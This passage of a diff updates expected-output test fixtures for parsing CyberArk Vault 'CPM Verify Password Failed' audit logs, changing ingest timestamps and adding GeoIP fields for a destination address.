08:04:11\",\"IsoTimestamp\":\"2021-03-15T15:04:11Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=1;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615820651\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", @@ -449,10 +485,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "ELASTIC.local\\bart" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -536,7 +581,7 @@ "event": { "severity": 7, "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-12-09T13:37:01.193619800Z", + "ingested": "2021-12-14T14:42:29.505125480Z", "original": "\u003c7\u003e1 2021-03-15T16:35:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 09:35:01\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T16:35:01Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=2;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615826099\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 09:35:01\",\"IsoTimestamp\":\"2021-03-15T16:35:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=2;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"2\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615826099\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", @@ -644,7 +689,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified", - "ingested": "2021-12-09T13:37:01.193625500Z", + "ingested": "2021-12-14T14:42:29.505125899Z", "original": "\u003c7\u003e1 2021-03-15T16:56:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 09:56:29\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T16:56:29Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=10.0.1.20;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.0.1.20\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615827245\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 09:56:29\",\"IsoTimestamp\":\"2021-03-15T16:56:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\",\"ExtraDetails\":\"address=10.0.1.20;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"10.0.1.20\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615827245\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", @@ -754,7 +799,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application", - "ingested": "2021-12-09T13:37:01.193631200Z", + "ingested": "2021-12-14T14:42:29.505126275Z", "original": "\u003c7\u003e1 2021-03-15T17:01:07Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:01:07\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:01:07Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=10.0.1.20;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.0.1.20\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615827554\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"mariadb\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:01:07\",\"IsoTimestamp\":\"2021-03-15T17:01:07Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\\n\",\"ExtraDetails\":\"address=10.0.1.20;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"10.0.1.20\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615827554\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"DSN\",\"Value\":\"mariadb\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", @@ -864,7 +909,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length", - "ingested": "2021-12-09T13:37:01.193636900Z", + "ingested": "2021-12-14T14:42:29.505126654Z", "original": "\u003c7\u003e1 2021-03-15T17:05:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:05:47\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:05:47Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=10.0.1.20;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.0.1.20\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615827864\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"DRIVER={MariaDB ODBC 3.1 Driver};TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:05:47\",\"IsoTimestamp\":\"2021-03-15T17:05:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\",\"ExtraDetails\":\"address=10.0.1.20;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"10.0.1.20\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615827864\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"DSN\",\"Value\":\"DRIVER={MariaDB ODBC 3.1 Driver};TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", @@ -974,7 +1019,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length", - "ingested": "2021-12-09T13:37:01.193642600Z", + "ingested": "2021-12-14T14:42:29.505127032Z", "original": "\u003c7\u003e1 2021-03-15T17:10:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:10:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:10:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\u003c/Reason\u003e\\n 